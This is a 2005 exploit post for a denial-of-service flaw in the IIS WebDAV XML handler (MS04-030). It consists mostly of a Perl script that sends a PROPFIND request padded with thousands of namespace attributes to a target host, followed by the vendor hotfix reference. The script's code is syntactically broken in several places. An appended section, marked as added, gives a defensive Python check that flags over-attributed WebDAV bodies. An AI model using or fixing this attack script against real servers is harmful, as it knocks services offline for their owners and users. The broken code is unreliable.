IIS Webdav DOS Exploit
Category: Vulnerability Posted: 2005-04-07 by basher13 Views: 700
Update:
8:06 AM 4/7/2005
Subject:
" IIS Webdav DOS Exploit "
Description:
Microsoft Internet Information Server (IIS) versions 5.0, 5.1 and 6.0 contain a
denial of service vulnerability. The vulnerability exists in the Microsoft XML Parser
component and can be exploited through the WebDAV XML message handler.
Vulnerability:
A denial of service vulnerability exists that could allow an attacker
to send a specially crafted WebDAV request to a server that is running IIS
and WebDAV. An attacker could cause WebDAV to consume all available memory
and CPU time on an affected server. The IIS service would have to be restarted
to restore functionality.
Exploit:
#!/usr/bin/perl
# IIS Webdav DOS Exploit
# -------------------------------------
#
# Greats:Amit Klein(has discovered bug)
# info: 98.to/infamous
use IO::Socket;
if (@ARGV < 2)
{
system "clear";
print "\n\n IIS Webdav DOS Exploit\n";
print "---------------------------------\n";
print "INFGP - Hacking&Security Research\n;
print "\n\n";
print "[-]Usage: iisdav.pl [host] [port] \n";
print "[!]Exam: iisdav.pl www.victim.com 80 \n\n";
exit(1);
}
system "clear";
$server = $ARGV[0];
$port= $ARGV[1];
system "clear";
print "\n[+]Connecting to host:\n\n";
print $server;
$inet = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "$port",
unless ($inet)
{
die "[-]$server connection [FAILED]\n"
}
print "[+]Creating socket [OK]\n");
for ($count=1; $count<9999; $count++)
{
$xmlatt = $xmlatt. "xmlns:z" . $count . "="xml:" ";
}
$0day = "<?xml version="1.0"?>
<a:propfind xmlns:a="DAV:" " . $xmlatt . ">
<a:prop><a:getcontenttype/></a:prop>
</a:propfind>";
$l=length($0day);
$req="PROPFIND / HTTP/1.1
Content-type: text/xml
Host: $host
Content-length: $l $0day ";
print "[+]Sent 0day..\n\n";
syswrite($socket,$req,length($req));
print "[+]Found Webdav!\n";
print "[?]SERVER DOS..[OK]";
close($inet);
Solution:
Refer to Microsoft Security Bulletin MS04-030 and install the KB824151 hotfix.
Vendor URL:
http://www.microsoft.com/technet/security/bulletin/MS04-030.mspx
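Detection side of the issue described above, as an added example that is not part of the original post: a pre-parse check that a filter or proxy in front of IIS could run on WebDAV XML bodies, flagging an element that carries an abnormal number of attributes before any XML parser sees it. The thresholds, the method list, the function names and both sample bodies are assumptions constructed for illustration.

```python
# Added example: pre-parse guard for WebDAV XML bodies (not from the original post).
# Thresholds and method list are assumptions; tune them for your clients.
MAX_BODY_BYTES = 64 * 1024
MAX_ATTRS_PER_ELEMENT = 64
WEBDAV_XML_METHODS = {"PROPFIND", "PROPPATCH", "LOCK", "SEARCH"}


def max_attrs_per_tag(body: bytes) -> int:
    """Largest attribute count on any single tag, found in one linear pass.

    Counts '=' signs that sit inside a tag but outside a quoted value, so the
    body is never handed to an XML parser before it has been vetted.
    """
    worst = count = 0
    in_tag = False
    quote = None
    for ch in body:
        if quote is not None:            # inside a quoted attribute value
            if ch == quote:
                quote = None
        elif not in_tag:
            if ch == 0x3C:               # '<' opens a tag
                in_tag, count = True, 0
        elif ch in (0x22, 0x27):         # '"' or "'" opens a value
            quote = ch
        elif ch == 0x3D:                 # '=' marks one attribute
            count += 1
        elif ch == 0x3E:                 # '>' closes the tag
            in_tag = False
            worst = max(worst, count)
    return max(worst, count) if in_tag else worst


def check_webdav_request(method: str, body: bytes):
    """Return (allowed, reason) for a request about to reach the WebDAV handler."""
    if method.upper() not in WEBDAV_XML_METHODS:
        return True, "not a WebDAV XML method"
    if len(body) > MAX_BODY_BYTES:
        return False, "body larger than MAX_BODY_BYTES"
    attrs = max_attrs_per_tag(body)
    if attrs > MAX_ATTRS_PER_ELEMENT:
        return False, f"{attrs} attributes on one element"
    return True, "ok"


# Constructed samples: an ordinary PROPFIND body and one padded with 500 namespace declarations.
NORMAL = (b'<?xml version="1.0"?><a:propfind xmlns:a="DAV:">'
          b'<a:prop><a:getcontenttype/></a:prop></a:propfind>')
PADDED = NORMAL.replace(
    b'xmlns:a="DAV:"',
    b'xmlns:a="DAV:" ' + b" ".join(b'xmlns:n%d="urn:example:%d"' % (i, i) for i in range(500)))

if __name__ == "__main__":
    for name, body in (("normal", NORMAL), ("padded", PADDED)):
        print(name, check_webdav_request("PROPFIND", body))
```

A check like this is a compensating control for servers that cannot yet be patched; the fix remains the hotfix named under Solution.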